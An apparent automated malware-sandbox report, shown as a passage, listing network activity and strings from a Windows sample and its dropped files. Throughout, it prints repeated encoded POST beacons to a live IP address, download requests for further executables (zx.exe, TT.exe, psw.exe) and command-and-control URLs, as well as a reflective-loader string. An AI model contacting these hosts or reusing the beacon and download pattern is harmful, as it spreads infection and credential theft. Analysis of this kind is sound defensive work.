      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 133Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 73 72 57 39 74 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 2f 61 32 2b 71 65 62 6f 39 65 6e 39 74 4b 6a 6d 36 75 76 31 36 2f 58 71 34 75 76 76 37 76 32 34 74 71 75 31 75 72 61 2b 35 75 37 74 36 65 6e 75 34 2f 32 75 71 4c 36 70 74 62 71 32 76 75 61 36 74 37 32 30 74 61 6a 39 72 71 2f 6d 36 76 32 36 72 65 62 72 Data Ascii: data=srW9tObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i/a2+qebo9en9tKjm6uv16/Xq4uvv7v24tqu1ura+5u7t6enu4/2uqL6ptbq2vua6t720taj9rq/m6v26rebr
      Source: global trafficHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: unknownTCP traffic detected without corresponding DNS query: 185.81.68.147
      Source: C:\Users\user\Desktop\52kYJGCon6.exeCode function: 0_2_00007FF795D2EF58 InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,HeapAlloc,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF795D2EF58
      Source: global trafficHTTP traffic detected: GET /zx.exe HTTP/1.1User-Agent: Mozilla/5.0Host: 185.81.68.147Cache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /TT.exe HTTP/1.1User-Agent: Mozilla/5.0Host: 185.81.68.147Cache-Control: no-cache
      Source: unknownHTTP traffic detected: POST /data.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0Host: 185.81.68.147Content-Length: 49Connection: CloseCache-Control: no-cacheData Raw: 64 61 74 61 3d 72 37 71 6f 73 4f 62 71 2f 61 36 79 76 2b 62 6a 6e 2b 4f 65 6d 5a 6a 70 37 2b 6e 70 36 4f 50 6f 36 2b 6e 6f 36 2b 72 71 34 2b 37 69 Data Ascii: data=r7qosObq/a6yv+bjn+OemZjp7+np6OPo6+no6+rq4+7i
      Source: tmp1946.exe, tmp1946.exe, 0000000B.00000002.2550280470.000001DEDDCEC000.00000004.00000020.00020000.00000000.sdmp, tmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drString found in binary or memory: http://185.81.68.147/gg.php
      Source: tmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drString found in binary or memory: http://185.81.68.147/gg.phpReflectiveLoader
      Source: tmp1946.exe, 0000000B.00000002.2550280470.000001DEDDCEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/gg.phpdb
      Source: tmp1946.exe, 0000000B.00000002.2550280470.000001DEDDCEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/gg.phptmUP
      Source: tmp1946.exe, tmp1946.exe, 0000000B.00000002.2550280470.000001DEDDCEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.81.68.147/psw.exe
      Source: tmp1946.exe, 0000000B.00000000.2285738075.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe, 0000000B.00000002.2550694420.00007FF683977000.00000002.00000001.01000000.0000000E.sdmp, tmp1946.exe.2.drString found in binary or memory: http://185.81.68.147/psw.exeDiamotrixGDU1CAMRFRsZKUklCBwfBgYIGDUVCQ4AEw==DiamotrixGDUFBBwXHRscGDUtAg
      Source: tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D49000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247517207.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258958415.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248074256.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2247931359.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2256277790.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2258237059.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2263553092.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2262428739.0000024B41D4C000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 00000006.00000003.2248288112.0000024B41D40000.00000004.00000020.00020000.00000000.sdmp, tmp8AEF.exe, 